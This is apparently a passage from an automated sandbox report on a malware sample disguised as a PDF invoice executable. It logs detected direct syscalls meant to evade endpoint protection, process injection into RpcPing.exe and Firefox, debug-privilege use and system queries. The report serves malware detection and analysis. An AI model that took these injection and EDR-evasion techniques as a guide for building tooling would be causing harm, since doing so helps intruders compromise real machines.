Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10AD0 mov eax, dword ptr fs:[00000030h] 3_2_01A10AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A44AD0 mov eax, dword ptr fs:[00000030h] 3_2_01A44AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A44AD0 mov eax, dword ptr fs:[00000030h] 3_2_01A44AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4CA24 mov eax, dword ptr fs:[00000030h] 3_2_01A4CA24
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3EA2E mov eax, dword ptr fs:[00000030h] 3_2_01A3EA2E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A34A35 mov eax, dword ptr fs:[00000030h] 3_2_01A34A35
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A34A35 mov eax, dword ptr fs:[00000030h] 3_2_01A34A35
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9CA11 mov eax, dword ptr fs:[00000030h] 3_2_01A9CA11
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4CA6F mov eax, dword ptr fs:[00000030h] 3_2_01A4CA6F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4CA6F mov eax, dword ptr fs:[00000030h] 3_2_01A4CA6F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4CA6F mov eax, dword ptr fs:[00000030h] 3_2_01A4CA6F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABEA60 mov eax, dword ptr fs:[00000030h] 3_2_01ABEA60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8CA72 mov eax, dword ptr fs:[00000030h] 3_2_01A8CA72
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8CA72 mov eax, dword ptr fs:[00000030h] 3_2_01A8CA72
Enables debug privileges
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory written: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\RpcPing.exe Thread register set: target process: 8104 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\RpcPing.exe Thread APC queued: target process: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
